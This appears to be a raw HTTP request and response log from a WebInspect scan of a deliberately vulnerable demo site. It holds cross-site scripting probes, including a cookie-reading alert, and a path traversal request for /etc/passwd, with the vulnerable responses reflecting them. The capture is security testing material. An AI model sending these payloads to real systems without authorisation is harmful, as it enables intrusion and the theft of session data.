bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /images/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:25:10 GMT Content-Type: text/html Content-Length: 172 <html><head><title>Directory Listing Denied</title></head> <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
GET /admin/WS_FTP.LOG HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:43:31 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Fri, 19 Oct 2001 03:54:02 GMT ETag: "623ab4b05158c11:8f6" Content-Length: 4940 10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html 10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html 10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg 10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm 10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html 10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg 10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm 10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg 10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log 10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif 10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg 10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm 10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html 10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html 10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg 10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif 10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html 10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg 10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif 10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg 10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg 10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg 10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg 10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG 10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif 10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif 10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif 10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg 10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg 10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG 10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif 10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg 10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm 10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html 10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html 10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg 10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif 10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html 10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg 10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif 10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg 10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg 10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg 10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg 10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG 10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif 10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif 10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif 10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg 10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
POST /testing/pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/ Content-Length: 40 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=--><script>alert('XSS')</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:56:38 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 186 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was --><script>alert('XSS')</script> </body> </html>
GET /cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:43:19 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:01 GMT ETag: "ac14c2f8a9dc11:8f6" Content-Length: 18 bleh exploit :0:0:
GET /forgot1.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/forgot.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes=; passes2=; passes3=; CustomCookie=WebInspect
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:49 GMT X-Powered-By: ASP.NET Location: forgot2.asp?msg2=no&msg=We+could+not+find+your+e-mail+address+in+our+database.+Please+join+below. Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /plink.asp?a=--><script>alert('XSS')</script>&c=12 HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:36:59 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 198 Content-Type: text/html Cache-control: private <html> <body> <P>The parameter "a" = --><script>alert('XSS')</script></P> <P>The parameter "c" = 12</P><br> <a href="pindex.asp">Click here to return to index</a> </body> </html>
GET /join.asp?name=&email=&surname=&house=>"><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=>"'><img%20src="javascript:alert('XSS')">&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:36 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=test@<script>alert(document.cookie)</script>.com HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:54:40 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 3998 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>test@<script>alert(document.cookie)</script>.com</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 